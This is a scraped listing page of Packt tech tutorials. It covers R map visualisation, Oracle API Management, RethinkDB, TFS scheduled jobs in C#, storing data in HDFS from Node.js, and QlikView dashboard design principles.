map$setView(as.numeric(dt[which(dt$Dest == 'MCI'), + c('lat', 'lon')]), zoom = 4) > for (i in 1:nrow(dt)) + map$marker(c(dt$lat[i], dt$lon[i]), bindPopup = dt$tip[i]) > map$show() Similarly, RStudio's leaflet package and the more general htmlwidgets package also provide some easy ways to generate JavaScript-powered data visualizations. Let's load the library and define the steps one by one using the pipe operator from the magrittr package, which is pretty standard for all packages created or inspired by RStudio or Hadley Wickham: > library(leaflet) > leaflet(us) %>% + addProviderTiles("Acetate.terrain") %>% + addPolygons() %>% + addMarkers(lng = dt$lon, lat = dt$lat, popup = dt$tip) I especially like this latter map, as we can load a third-party satellite map in the background, then render the states as polygons; we also added the original data points along with some useful tooltips on the very same map with literally a one-line R command. We could even color the state polygons based on the aggregated results we computed in the previous sections! Ever tried to do the same in Java? Alternative map designs Besides being able to use some third-party tools, another main reason why I tend to use R for all my data analysis tasks is that R is extremely powerful in creating custom data exploration, visualization, and modeling designs. As an example, let's create a flow-map based on our data, where we will highlight the flights from Houston based on the number of actual and cancelled flights. We will use lines and circles to render these two variables on a 2-dimensional map, and we will also add a contour plot in the background based on the average time delay. But, as usual, let's do some data transformations first! To keep the number of flows at a minimal level, let's get rid of the airports outside the USA at last: > dt <- dt[point.in.polygon(dt$lon, dt$lat, + usa_data$x, usa_data$y) == 1, ] We will need the diagram package (to render curved arrows from Houston to the destination airports) and the scales package to create transparent colors: > library(diagram) > library(scales) Then let's render the contour map described in the Contour Lines section: > map("usa") > title('Number of flights, cancellations and delays from Houston') > image(look, add = TRUE) > map("state", lwd = 3, add = TRUE) And then add a curved line from Houston to each of the destination airports, where the width of the line represents the number of cancelled flights and the diameter of the target circles shows the number of actual flights: > for (i in 1:nrow(dt)) { + curvedarrow( + from = rev(as.numeric(h)), + to = as.numeric(dt[i, c('lon', 'lat')]), + arr.pos = 1, + arr.type = 'circle', + curve = 0.1, + arr.col = alpha('black', dt$N[i] / max(dt$N)), + arr.length = dt$N[i] / max(dt$N), + lwd = dt$Cancelled[i] / max(dt$Cancelled) * 25, + lcol = alpha('black', + dt$Cancelled[i] / max(dt$Cancelled))) + } Well, this article ended up being about visualizing spatial data, and not really about analyzing spatial data by fitting models and filtering raw data. Summary In case you are interested in knowing other R-related books that Packt has in store for you, here is the link: R for Data Science Practical Data Science Cookbook Resources for Article: Further resources on this subject: R ─ Classification and Regression Trees[article] An overview of common machine learning tasks[article] Reduction with Principal Component Analysis [article]

0
0
2453

article-image-oracle-api-management-implementation-12c

Packt

29 Sep 2015

5 min read

Oracle API Management Implementation 12c

Packt

29 Sep 2015

5 min read

This article by Luis Augusto Weir, the author of the book, Oracle API Management 12c Implementation, gives you a gist of what is covered in the book. At present, the digital transformation is essential for any business strategy, regardless of the industry they belong to an organization. (For more resources related to this topic, see here.) The companies who embark on a journey of digital transformation, they become able to create innovative and disruptive solutions; this in order to deliver a user experience much richer, unified, and personalized at lower cost. These organizations are able to address customers dynamically and across a wide variety of channels, such as mobile applications, highly responsive websites, and social networks. Ultimately, companies that develop models aligned digital innovation business, acquire a considerable competitive advantage over those that do not. The main trigger for this transformation is the ability to expose and make available business information and key technological capabilities for this, which often are buried in information systems (EIS) of the organization, or in components integration are only visible internally. In the digital economy, it is highly desirable to realize those assets in a standardized way through APIs, this course, in a controlled, scalable, and secure environment. The lightweight nature and ease of finding/using these APIs greatly facilitates its adoption as the essential mechanism to expose and/or consume various features from a multichannel environment. API Management is the discipline that governs the development cycle of APIs, defining the tools and processes needed to build, publish, and operate, also including management development communities around them. Our recent book, API Management Oracle 12c (Luis Weir, Andrew Bell, Rolando Carrasco, Arturo Viveros), is a very comprehensive and detailed to implement API Management in an organization guide. In this book, he explains the relationship that keeps this discipline with concepts such great detail as SOA Governance and DevOps .The convergence of API Management with SOA and governance of such services is addressed particularly to explain and shape the concept of Application Services Governance (ESG). On the other hand, it highlights the presence of case studies based on real scenarios, with multiple examples to demonstrate the correct definition and implementation of a robust strategy in solving supported Oracle Management API. The book begins by describing a number of key concepts about API Management and contextualizing the complementary disciplines, such as SOA Governance, DevOps, and Enterprise Architecture (EA). This is in order to clear up any confusion about the relationship to these topics. Then, all these concepts are put into practice by defining the case study of an organization with real name, which previously dealt with successfully implementing a service-oriented architecture considering the government of it, and now It is the need/opportunity to extend its technology platform by implementing a strategy of API Management. Throughout the narrative of the case are also described: Business requirements justifying the adoption of API Management The potential impact of the proposed solution on the organization The steps required to design and implement the strategy The definition and implementation of the assessment of maturity (API Readiness) and analysis of gaps in terms of: people, tools, and technology The exercise of evaluation and selection of products, explaining the choice of Oracle as the most appropriate solution The implementation roadmap API Management In later chapters, the various steps are being addressed one by one needed to solve the raised stage, by implementing the following reference architecture for API Management, based on the components of the Oracle solution: Catalog API, API Manager, and API Gateway. In short, the book will enable the reader to acquire a number of advanced knowledge on the following topics: API Management, its definition, concepts, and objectives Differences and similarities between API Management and SOA Governance; where and how these two disciplines converge in the concept of ESG Application Services Governance[d1] and how to define a framework aimed at ASG Definition and implementation of the assessment of maturity for API Management Criteria for the selection and evaluation tools; Why Oracle API Management Suite? Implementation of Oracle API Catalog (OAC), including OAC harvesting by bootstrapping & ANT scripts and JDev, OAC Console, user creation and management, metadata API, API Discovery, and how to extend the functionality of OAC REX by API. Management APIs and challenges in general API Management Oracle Implementation Manager API (OAPIM), including the creation, publishing, monitoring, subscription, and life cycle management APIs by OAPIM Portal Common scenarios for adoption/implementation of API Management and how to solve them[d2] Implementation of Oracle API Gateway (OAG), including creation of policies with different filters, OAuth authentication, integration with LDAP, SOAP/REST APIs conversions, and Testing. Defining the deployment topology for Oracle API Management Suite Installing and configuring OAC, OAPIM, and OAG 12c Oracle Management API is designed for the following audience: Enterprise Architects, Solution Architects, Technical Leader and SOA and APIs professionals seeking to know thoroughly and successfully implement the Oracle API Management solution. Summary In this article, we looked at Oracle API Management Implementation 12c in brief. More information on this is provided in the book. Resources for Article: Further resources on this subject: Oracle 12c SQL and PL/SQL New Features[article] Securing Data at Rest in Oracle 11g[article] Getting Started with Oracle Primavera P6 [article]

0
0
4859

How-To Tutorials

article-image-designing-and-building-vrealize-automation-62-infrastructure

Packt

29 Sep 2015

16 min read

Designing and Building a vRealize Automation 6.2 Infrastructure

Packt

29 Sep 2015

16 min read

0
0
6430

Packt

29 Sep 2015

27 min read

Lights and Effects

Packt

29 Sep 2015

27 min read

0
0
21105

Jonathan Pollack

28 Sep 2015

6 min read

Learning RethinkDB

Jonathan Pollack

28 Sep 2015

6 min read

RethinkDB is a relatively new, fully open-source NoSQL database, featuring: ridiculously easy sharding, replicating, & database management, table joins (that’s right!), geospatial & time-series support, and real-time monitoring of complicated queries. I think the feature list alone makes this a piece of tech worth looking further into, to say nothing of the fact that we’ll likely be seeing an explosion of apps that use RethinkDB as their fundamental database–so developers, get ready to have to learn about yet another database. That said, like any tool, you should consult your doctor when deciding if RethinkDB is right for you. When to avoid Like most NoSQL offerings, RethinkDB has a few conscience trade-offs in its design, most notably when it comes to ACID compliance, and the CAP-theorem. If you need a fully ACID compliant database, or strong type checking across your schema, you would be better served by a traditional SQL database. If you absolutely need write availability over data consistency–RethinkDB favors consistency. Also, because of how queries are performed and returned, “big data” use cases are probably not a great fit for this database–specifically if you want to handle results larger than 64 MB, or are performing computationally intensive work on your stored data. When to consider You want a great web-based management console for data-center configuration (sharding, replication, etc.), database monitoring, and testing queries. You want the flexibility of a schema-less database, with the ability to easily express relationships via table joins. You need to perform geospatial queries (e.g. find all documents with locations within 5km of a given point). You deal with time series data, especially across various times zones. You need to push data to your client based off of realtime changes to your data, as a result of complex queries. Management console The web console is insanely easy to use, and gives you all of the control you need for administrating your data-center–even if it is only a data-center of one database. Setting up a data-center is just a matter of pointing your new database to an existing node in a cluster. Once that’s done, you can use the web console to shard (and re-shard) your data, as well as determine how many replicas you want floating around. You can also run queries (and profile those queries) against your databases straight form the web console, giving you quick access to your data and performance. Table joins (capturing data relations) One of the best pieces of syntatic sugar that RethinkDB provides, in my opinion, is the ability to do table joins. While, certainly, this isn’t that magical–what we’re doing is essentially a nested query via a specified field to be used as the nested lookup’s primary key–it really does make queries easy to read and compose. r.table("table1").eq_join("doc_field_as_table2_primary_key", r.table("table2")).zip().run() Even more awesomely, the JavaScript ORM Thinky allows for very slick, seamless query-level joins, based on the same principal. Geospatial primitives Given that location aware queries are becoming more and more popular, if not downright necessary, it’s great to see that RethinkDB comes with support for the following geometric primitives:point, line, polygon (at least 3 sided), circle, and polygonSub (subtract one polygon from the larger, enclosing polygon). It allows for the following types of queries: distance, intersects, includes, getIntersecting, and getNearest. For example, you can find all of the documents within 5 km of Greenwich, England. r.table("table1").getNearest(r.point(0,0), {index: "table1_geo_index", maxDist: 5, unit: "km"}).run() Time-series support (sane date & time primitives) Official drivers do native conversions for you, which means timezone-aware context driven queries can be made that allow you to find documents that occurred at a given time on a given day in a given timezone. Some other cool features: Times can be used as indexes. Time operations are handled on the database, allowing them to be executed across the cluster effortlessly. Take, for example, the desire to figure out how many customer support tickets were coming in between 9 am, and 5 pm, every day. We don’t want to have to figure out how to offset the time-stamp on each document, given that the timezones could each be different. Thankfully, RethinkDB will do this accounting, and spread out the computation across the cluster without asking us for a thing. r.table('customer-support-tickets').filter(function (ticket) { // ticket.hours() is automatically dealt with in its own timezone return ticket('time').hours().lt(9).or( ticket('time').hours().ge(17)); }).count().run(); Realtime query result monitoring (change feeds) Probably by far and away the most impressive feature of RethinkDB has to be change-feeds. You can turn almost every practical query that you would want to monitor into a live stream of changes just by chaining the function call changes() to the end. For example, monitor the changes to a given table: r.table("table1").changes().run() or to a given query (the ordering of a table, for instance): r.table("table1").orderBy("key").changes().run() And of course, the queries can be made more complicated, but these examples above should blow your mind. No more pulling, no more having to come up with the data diffs yourself before pushing them to the client. RethinkDB will do the diff for you, and push the results straight to your server. There is one caveat here, however; while this is decent for order-of-magnitude: 10 clients, it is more efficient to couple your change-feeds to a pub-sub service when pushing to many clients. Conclusion RethinkDB has a lot of cool things to be excited about: ReQL (it’s readable, highly functional syntax), cluster management, primitives for 21st century applications, and change-feeds. And you know what, if RethinkDB only had change-feeds, I would still be extremely excited about it–think of all that time you no longer have to spend banging your head against the wall trying to deal with consistence and concurrency issues! If you are thinking about starting a new project, or are tired of fighting with your current NoSQL database, and don’t have any requirements in the “avoid camp”, you should highly consider using RethinkDB. About the author Jonathan Pollack is a full stack developer living in Berlin. He previously worked as a web developer at a public shoe company, and prior to that, worked at a start up that’s trying to build the world’s best pan-cloud virtualization layer. He can be found on Twitter @murphydanger.

0
0
2228

How-To Tutorials

article-image-creating-tfs-scheduled-jobs

Packt

28 Sep 2015

12 min read

Creating TFS Scheduled Jobs

Packt

28 Sep 2015

12 min read

In this article by Gordon Beeming, the author of the book, Team Foundation Server 2015 Customization, we are going to cover TFS scheduled jobs. The topics that we are going to cover include: Writing a TFS Job Deploying a TFS Job Removing a TFS Job You would want to write a scheduled job for any logic that needs to be run at specific times, whether it is at certain increments or at specific times of the day. A scheduled job is not the place to put logic that you would like to run as soon as some other event, such as a check-in or a work item change, occurs. It will automatically link change sets to work items based on the comments. (For more resources related to this topic, see here.) The project setup First off, we'll start with our project setup. This time, we'll create a Windows console application. Creating a new windows console application The references that we'll need this time around are: Microsoft.VisualStudio.Services.WebApi.dll Microsoft.TeamFoundation.Common.dll Microsoft.TeamFoundation.Framework.Server.dll All of these can be found in C:Program FilesMicrosoft Team Foundation Server 14.0Application TierTFSJobAgent on the TFS server. That's all the setup that is required for your TFS job project. Any class that inherit ITeamFoundationJobExtension will be able to be used for a TFS Job. Writing the TFS job So, as mentioned, we are going to need a class that inherits from ITeamFoundationJobExtension. Let's create a class called TfsCommentsToChangeSetLinksJob and inherit from ITeamFoundationJobExtension. As part of this, we will need to implement the Run method, which is part of an interface, like this: public class TfsCommentsToChangeSetLinksJob : ITeamFoundationJobExtension { public TeamFoundationJobExecutionResult Run( TeamFoundationRequestContext requestContext, TeamFoundationJobDefinition jobDefinition, DateTime queueTime, out string resultMessage) { throw new NotImplementedException(); } } Then, we also add the using statement: using Microsoft.TeamFoundation.Framework.Server; Now, for this specific extension, we'll need to add references to the following: Microsoft.TeamFoundation.Client.dll Microsoft.TeamFoundation.VersionControl.Client.dll Microsoft.TeamFoundation.WorkItemTracking.Client.dll All of these can be found in C:Program FilesMicrosoft Team Foundation Server 14.0Application TierTFSJobAgent. Now, for the logic of our plugin, we use the following code inside of the Run method as a basic shell, where we'll then place the specific logic for this plugin. This basic shell will be adding a try catch block, and at the end of the try block, it will return a successful job run. We'll then add to the job message what exception may be thrown and returning that the job failed: resultMessage = string.Empty; try { // place logic here return TeamFoundationJobExecutionResult.Succeeded; } catch (Exception ex) { resultMessage += "Job Failed: " + ex.ToString(); return TeamFoundationJobExecutionResult.Failed; } Along with this code, you will need the following using function: using Microsoft.TeamFoundation; using Microsoft.TeamFoundation.Client; using Microsoft.TeamFoundation.VersionControl.Client; using Microsoft.TeamFoundation.WorkItemTracking.Client; using System.Linq; using System.Text.RegularExpressions; So next, we need to place some logic specific to this job in the try block. First, let's create a connection to TFS for version control: TfsTeamProjectCollection tfsTPC = TfsTeamProjectCollectionFactory.GetTeamProjectCollection( new Uri("http://localhost:8080/tfs")); VersionControlServer vcs = tfsTPC.GetService<VersionControlServer>(); Then, we will query the work item store's history and get the last 25 check-ins: WorkItemStore wis = tfsTPC.GetService<WorkItemStore>(); // get the last 25 check ins foreach (Changeset changeSet in vcs.QueryHistory("$/", RecursionType.Full, 25)) { // place the next logic here } Now that we have the changeset history, we are going to check the comments for any references to work items using a simple regex expression: //try match the regex for a hash number in the comment foreach (Match match in Regex.Matches((changeSet.Comment ?? string.Empty), @"#d{1,}")) { // place the next logic here } Getting into this loop, we'll know that we have found a valid number in the comment and that we should attempt to link the check-in to that work item. But just the fact that we have found a number doesn't mean that the work item exists, so let's try find a work item with the found number: int workItemId = Convert.ToInt32(match.Value.TrimStart('#')); var workItem = wis.GetWorkItem(workItemId); if (workItem != null) { // place the next logic here } Here, we are checking to make sure that the work item exists so that if the workItem variable is not null, then we'll proceed to check whether a relationship for this changeSet and workItem function already exists: //now create the link ExternalLink changesetLink = new ExternalLink( wis.RegisteredLinkTypes[ArtifactLinkIds.Changeset], changeSet.ArtifactUri.AbsoluteUri); //you should verify if such a link already exists if (!workItem.Links.OfType<ExternalLink>() .Any(l => l.LinkedArtifactUri == changeSet.ArtifactUri.AbsoluteUri)) { // place the next logic here } If a link does not exist, then we can add a new link: changesetLink.Comment = "Change set " + $"'{changeSet.ChangesetId}'" + " auto linked by a server plugin"; workItem.Links.Add(changesetLink); workItem.Save(); resultMessage += $"Linked CS:{changeSet.ChangesetId} " + $"to WI:{workItem.Id}"; We just have the extra bit here so as to get the last 25 change sets. If you were using this for production, you would probably want to store the last change set that you processed and then get history up until that point, but I don't think it's needed to illustrate this sample. Then, after getting the list of change sets, we basically process everything 100 percent as before. We check whether there is a comment and whether that comment contains a hash number that we can try linking to a changeSet function. We then check whether a workItem function exists for the number that we found. Next, we add a link to the work item from the changeSet function. Then, for each link we add to the overall resultMessage string so that when we look at the results from our job running, we can see which links were added automatically for us. As you can see, with this approach, we don't interfere with the check-in itself but rather process this out-of-hand way of linking changeSet to work with items at a later stage. Deploying our TFS Job Deploying the code is very simple; change the project's Output type to Class Library. This can be done by going to the project properties, and then in the Application tab, you will see an Output type drop-down list. Now, build your project. Then, copy the TfsJobSample.dll and TfsJobSample.pdb output files to the scheduled job plugins folder, which is C:Program FilesMicrosoft Team Foundation Server 14.0Application TierTFSJobAgentPlugins. Unfortunately, simply copying the files into this folder won't make your scheduled job automatically installed, and the reason for this is that as part of the interface of the scheduled job, you don't specify when to run your job. Instead, you register the job as a separate step. Change Output type back to Console Application option for the next step. You can, and should, split the TFS job from its installer into different projects, but in our sample, we'll use the same one. Registering, queueing, and deregistering a TFS Job If you try install the job the way you used to in TFS 2013, you will now get the TF400444 error: TF400444: The creation and deletion of jobs is no longer supported. You may only update the EnabledState or Schedule of a job. Failed to create, delete or update job id 5a7a01e0-fff1-44ee-88c3-b33589d8d3b3 This is because they have made some changes to the job service, for security reasons, and these changes prevent you from using the Client Object Model. You are now forced to use the Server Object Model. The code that you have to write is slightly more complicated and requires you to copy your executable to multiple locations to get it working properly. Place all of the following code in your program.cs file inside the main method. We start off by getting some arguments that are passed through to the application, and if we don't get at least one argument, we don't continue: #region Collect commands from the args if (args.Length != 1 && args.Length != 2) { Console.WriteLine("Usage: TfsJobSample.exe <command "+ "(/r, /i, /u, /q)> [job id]"); return; } string command = args[0]; Guid jobid = Guid.Empty; if (args.Length > 1) { if (!Guid.TryParse(args[1], out jobid)) { Console.WriteLine("Job Id not a valid Guid"); return; } } #endregion We then wrap all our logic in a try catch block, and for our catch, we only write the exception that occurred: try { // place logic here } catch (Exception ex) { Console.WriteLine(ex.ToString()); } Place the next steps inside the try block, unless asked to do otherwise. As part of using the Server Object Model, you'll need to create a DeploymentServiceHost. This requires you to have a connection string to the TFS Configuration database, so make sure that the connection string set in the following is valid for you. We also need some other generic path information, so we'll mimic what we could expect the job agents' paths to be: #region Build a DeploymentServiceHost string databaseServerDnsName = "localhost"; string connectionString = $"Data Source={databaseServerDnsName};"+ "Initial Catalog=TFS_Configuration;Integrated Security=true;"; TeamFoundationServiceHostProperties deploymentHostProperties = new TeamFoundationServiceHostProperties(); deploymentHostProperties.HostType = TeamFoundationHostType.Deployment | TeamFoundationHostType.Application; deploymentHostProperties.Id = Guid.Empty; deploymentHostProperties.PhysicalDirectory = @"C:Program FilesMicrosoft Team Foundation Server 14.0"+ @"Application TierTFSJobAgent"; deploymentHostProperties.PlugInDirectory = $@"{deploymentHostProperties.PhysicalDirectory}Plugins"; deploymentHostProperties.VirtualDirectory = "/"; ISqlConnectionInfo connInfo = SqlConnectionInfoFactory.Create(connectionString, null, null); DeploymentServiceHost host = new DeploymentServiceHost(deploymentHostProperties, connInfo, true); #endregion Now that we have a TeamFoundationServiceHost function, we are able to create a TeamFoundationRequestContext function . We'll need it to call methods such as UpdateJobDefinitions, which adds and/or removes our job, and QueryJobDefinition, which is used to queue our job outside of any schedule: using (TeamFoundationRequestContext requestContext = host.CreateSystemContext()) { TeamFoundationJobService jobService = requestContext.GetService<TeamFoundationJobService>() // place next logic here } We then create a new TeamFoundationJobDefinition instance with all of the information that we want for our TFS job, including the name, schedule, and enabled state: var jobDefinition = new TeamFoundationJobDefinition( "Comments to Change Set Links Job", "TfsJobSample.TfsCommentsToChangeSetLinksJob"); jobDefinition.EnabledState = TeamFoundationJobEnabledState.Enabled; jobDefinition.Schedule.Add(new TeamFoundationJobSchedule { ScheduledTime = DateTime.Now, PriorityLevel = JobPriorityLevel.Normal, Interval = 300, }); Once we have the job definition, we check what the command was and then execute the code that will relate to that command. For the /r command, we will just run our TFS job outside of the TFS job agent: if (command == "/r") { string resultMessage; new TfsCommentsToChangeSetLinksJob().Run(requestContext, jobDefinition, DateTime.Now, out resultMessage); } For the /i command, we will install the TFS job: else if (command == "/i") { jobService.UpdateJobDefinitions(requestContext, null, new[] { jobDefinition }); } For the /u command, we will uninstall the TFS Job: else if (command == "/u") { jobService.UpdateJobDefinitions(requestContext, new[] { jobid }, null); } Finally, with the /q command, we will queue the TFS job to be run inside the TFS job agent and outside of its schedule: else if (command == "/q") { jobService.QueryJobDefinition(requestContext, jobid); } Now that we have this code in the program.cs file, we need to compile the project and then copy TfsJobSample.exe and TfsJobSample.pdb to the TFS Tools folder, which is C:Program FilesMicrosoft Team Foundation Server 14.0Tools. Now open a cmd window as an administrator. Change the directory to the Tools folder and then run your application with a /i command, as follows: Installing the TFS Job Now, you have successfully installed the TFS Job. To uninstall it or force it to be queued, you will need the job ID. But basically you have to run /u with the job ID to uninstall, like this: Uninstalling the TFS Job You will be following the same approach as prior for queuing, simply specifying the /q command and the job ID. How do I know whether my TFS Job is running? The easiest way to check whether your TFS Job is running or not is to check out the job history table in the configuration database. To do this, you will need the job ID (we spoke about this earlier), which you can obtain by running the following query against the TFS_Configuration database: SELECT JobId FROM Tfs_Configuration.dbo.tbl_JobDefinition WITH ( NOLOCK ) WHERE JobName = 'Comments to Change Set Links Job' With this JobId, we will then run the following lines to query the job history: SElECT * FROM Tfs_Configuration.dbo.tbl_JobHistory WITH (NOLOCK) WHERE JobId = '<place the JobId from previous query here>' This will return you a list of results about the previous times the job was run. If you see that your job has a Result of 6 which is extension not found, then you will need to stop and restart the TFS job agent. You can do this by running the following commands in an Administrator cmd window: net stop TfsJobAgent net start TfsJobAgent Note that when you stop the TFS job agent, any jobs that are currently running will be terminated. Also, they will not get a chance to save their state, which, depending on how they were written, could lead to some unexpected situations when they start again. After the agent has started again, you will see that the Result field is now different as it is a job agent that will know about your job. If you prefer browsing the web to see the status of your jobs, you can browse to the job monitoring page (_oi/_jobMonitoring#_a=history), for example, http://gordon-lappy:8080/tfs/_oi/_jobMonitoring#_a=history. This will give you all the data that you can normally query but with nice graphs and grids. Summary In this article, we looked at how to write, install, uninstall, and queue a TFS Job. You learned that the way we used to install TFS Jobs will no longer work for TFS 2015 because of a change in the Client Object Model for security. Resources for Article: Further resources on this subject: Getting Started with TeamCity[article] Planning for a successful integration[article] Work Item Querying [article]

0
0
13863

article-image-introduction-using-nodejs-hadoops-mapreduce-jobs

Harri Siirak

25 Sep 2015

5 min read

Using Node.js and Hadoop to store distributed data

Harri Siirak

25 Sep 2015

5 min read

Hadoop is a well-known open-source software framework for distributed storage and distributed processing of very large data sets on computer clusters built from commodity hardware. It's designed with a fundamental assumption that hardware failures can (and will) happen and thus should be automatically handled in software by the framework. Under the hood it's using HDFS (Hadoop Distributed File System) for the data storage. HDFS can store large files across multiple machines and it achieves reliability by replicating the data across multiple hosts (default replication factor is 3 and can be configured to be higher when needed). Although it's designed for mostly immutable files and may not be suitable for systems requiring concurrent write-operations. Its target usage is not only restricted to MapReduce jobs, but it also can be used for cost effective and reliable data storage. In the following examples, I am going to give you an overview of how to establish connections to HDFS storage (namenode) and how to perform basic operations on the data. As you can probably guess, I'm using Node.js to build these examples. Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices. So it's really ideal for what I want to show you next. Two popular libraries for acccessing HDFS in Node.js are node-hdfs and webhdfs. The first one uses Hadoop's native libhdfs library and protocol to communicate with Hadoop namenode, albeit it seems to be not maintained anymore and doesn't support Stream API. Another one is using WebHDFS, which defines a public HTTP REST API, directly built into Hadoop's core (namenodes and datanodes both) and which permits clients to access Hadoop from multiple languages without installing Hadoop, and supports all HDFS user operations including reading files, writing to files, making directories, changing permissions and renaming. More details about WebHDFS REST API and about its implementation details and response codes/types can be found from here. At this point I'm assuming that you have Hadoop cluster up and running. There are plenty of good tutorials out there showing how to setup and run Hadoop cluster (single and multi node). Installing and using the webhdfs library webhdfs implements most of the REST API calls, albeit it's not yet supporting Hadoop delegation tokens. It's also Stream API compatible what makes its usage pretty straightforward and easy. Detailed examples and use cases for another supported calls can be found from here. Install webhdfs from npm: npm install wehbhdfs Create a new script named webhdfs-client.js: // Include webhdfs module var WebHDFS = require('webhdfs'); // Create a new var hdfs = WebHDFS.createClient({ user: 'hduser', // Hadoop user host: 'localhost', // Namenode host port: 50070 // Namenode port }); module.exports = hdfs; Here we initialized new webhdfs client with options, including namenode's host and port where we are connecting to. Let's proceed with a more detailed example. Storing file data in HDFS Create a new script named webhdfs-write-test.js and add the code below. // Include created client var hdfs = require('./webhdfs-client'); // Include fs module for local file system operations var fs = require('fs'); // Initialize readable stream from local file // Change this to real path in your file system var localFileStream = fs.createReadStream('/path/to/local/file'); // Initialize writable stream to HDFS target var remoteFileStream = hdfs.createWriteStream('/path/to/remote/file'); // Pipe data to HDFS localFileStream.pipe(remoteFileStream); // Handle errors remoteFileStream.on('error', function onError (err) { // Do something with the error }); // Handle finish event remoteFileStream.on('finish', function onFinish () { // Upload is done }); Basically what we are doing here is that we're initializing readable file stream from a local filesystem and piping its contents seamlessly into remote HDFS target. Optionally webhdfs exposes error and finish. Reading file data from HDFS Let's retrieve the data what we just stored in HDFS storage. Create a new script named webhdfs-read-test.js and add code below. var hdfs = require('./webhdfs-client'); var fs = require('fs'); // Initialize readable stream from HDFS source var remoteFileStream = hdfs.createReadStream('/path/to/remote/file'); // Variable for storing data var data = new Buffer(); remoteFileStream.on('error', function onError (err) { // Do something with the error }); remoteFileStream.on('data', function onChunk (chunk) { // Concat received data chunk data = Buffer.concat([ data, chunk ]); }); remoteFileStream.on('finish', function onFinish () { // Upload is done // Print received data console.log(data.toString()); }); What's next? Now when we have data in Hadoop cluster, we can start processing it by spawning some MapReduce jobs, and when it's processed we can retrieve the output data. In the second part of this article, I'm going to give you an overview of how Node.js can be used as part of MapReduce jobs. About the author Harri is a senior Node.js/Javascript developer among a talented team of full-stack developers who specialize in building scalable and secure Node.js based solutions. He can be found on Github at harrisiirak.

0
2
19157

How-To Tutorials

Packt

25 Sep 2015

16 min read

Building JSF Forms

Packt

25 Sep 2015

16 min read

0
0
43283

How-To Tutorials

Packt

25 Sep 2015

11 min read

The Dashboard Design – Best Practices

Packt

25 Sep 2015

11 min read

In this article by Julian Villafuerte, author of the book Creating Stunning Dashboards with QlikView you know more about the best practices for the dashboard design. (For more resources related to this topic, see here.) Data visualization is a field that is constantly evolving. However, some concepts have proven their value time and again through the years and have become what we call best practices. These notions should not be seen as strict rules that must be applied without any further consideration but as a series of tips that will help you create better applications. If you are a beginner, try to stick to them as much as you can. These best practices will save you a lot of trouble and will greatly enhance your first endeavors. On the other hand, if you are an advanced developer, combine them with your personal experiences in order to build the ultimate dashboard. Some guidelines in this article come from the widely known characters in the field of data visualization, such as Stephen Few, Edward Tufte, John Tukey, Alberto Cairo, and Nathan Yau. So, if a concept strikes your attention, I strongly recommend you to read more about it in their books. Throughout this article, we will review some useful recommendations that will help you create not only engaging, but also effective and user-friendly dashboards. Remember that they may apply differently depending on the information displayed and the audience you are working with. Nevertheless, they are great guidelines to the field of data visualization, so do not hesitate to consider them in all of your developments. Gestalt principles In the early 1900s, the Gestalt school of psychology conducted a series of studies on human perception in order to understand how our brain interprets forms and recognizes patterns. Understanding these principles may help you create a better structure for your dashboard and make your charts easier to interpret: Proximity: When we see multiple elements located near one another, we tend to see them as groups. For example, we can visually distinguish clusters in a scatter plot by grouping the dots according to their position. Similarity: Our brain associates the elements that are similar to each other (in terms of shape, size, color, or orientation). For example, in color-coded bar charts, we can associate the bars that share the same color even if they are not grouped. Enclosure: If a border surrounds a series of objects, we perceive them as part of a group. For example, if a scatter plot has reference lines that wrap the elements between 20 and 30 percent, we will automatically see them as a cluster. Closure: When we detect a figure that looks incomplete, we tend to perceive it as a closed structure. For example, even if we discard the borders of a bar chart, the axes will form a region that our brain will isolate without needing the extra lines. Continuity: If a number of objects are aligned, we will perceive them as a continuous body. For example, the different blocks of code when you indent QlikView script are percieved as one continuous code. Connection: If objects are connected by a line, we will see them as a group. For example, we tend to associate the dots connected by lines on a scatter plot with lines and symbols. Giving context to the data When it comes to analyzing data, context is everything. If you present isolated figures, the users will have a hard time trying to find the story hidden behind them. For example, if I told you that the gross margin of our company was 16.5 percent during the first quarter of 2015, would you evaluate it as a positive or negative sign? This is pretty difficult, right? However, what if we added some extra information to complement this KPI? Then, the following image would make a lot more sense: As you can see, adding context to the data can make the landscape look quite different. Now, it is easy to see that even though the gross margin has substantially improved during the last year, our company has some work to do in order to be competitive and surpass the industry standard. The appropriate references may change depending on the KPI you are dealing with and the goals of the organization, but some common examples are as follows: Last year's performance The quota, budget, or objective Comparison with the closest competitor, product, or employee The market share The industry standards Another good tip in this regard is to anticipate the comparisons. If you display figures regarding the monthly quota and the actual sales, you can save the users the mental calculations by including complementary indicators, such as the gap between them and the percentage of completion. Data-Ink Ratio One of the most interesting principles in the field of data visualization is Data-Ink Ratio, introduced by Edward R. Tufte in his book, The Visual Display of Quantitative Information, which must be read by every designer. In this publication, he states that there are two different types of ink (or in our case, pixels) in any chart, as follows: Data-ink: This includes all the nonerasable portions of graphic that are used to represent the actual data. These pixels are at the core of the visualization and cannot be removed without losing some of its content. Non-data-ink: This includes any element that is not directly related to the data or doesn't convey anything meaningful to the reader. Based on these concepts, he defined the Data Ink Ratio as the proportion of the graphic's ink that is devoted to the nonredundant display of data information: Data Ink Ratio = Data Ink / Total Ink As you can imagine, our goal is to maximize this number by decreasing the non-data-ink used in our dashboards. For example, the chart to the left has a low data-ink ratio due to the usage of 3D effects, shadows, backgrounds, and multiple grid lines. On the contrary, the chart to the right presents a higher ratio as most of the pixels are data-related. Avoiding chart junk Chart junk is another term coined by Tufte that refers to all the elements that distract the viewer from the actual information in a graphic. Evidently, chart junk is considered as non-data-ink and comprises of features such as heavy gridlines, frames, redundant labels, ornamental axes, backgrounds, overly complex fonts, shadows, images, or other effects included only as decoration. Take for instance the following charts: As you can see, by removing all the unnecessary elements in a chart, it becomes easier to interpret and looks much more elegant. Balance Colors, icons, reference lines, and other visual cues can be very useful to help the users focus on the most important elements in a dashboard. However, misusing or overusing these features can be a real hazard, so try to find the adequate balance for each of them. Excessive precision QlikView applications should use the appropriate language for each audience. When designing, think about whether precise figures will be useful or if they are going to become a distraction. Most of the time, dashboards show high-level KPIs, so it may be more comfortable for certain users to see rounded numbers, as in the following image: 3D charts One of Microsoft Excel's greatest wrongdoings is making everyone believe that 3D charts are good for data analysis. For some reason, people seem to love them; but, believe me, they are a real threat to business analysts. Despite their visual charm, these representations can easily hide some parts of the information and convey wrong perceptions depending on their usage of colors, shadows, and axis inclination. I strongly recommend you to avoid them in any context. Sorting Whether you are working with a list box, a bar chart, or a straight table, sorting an object is always 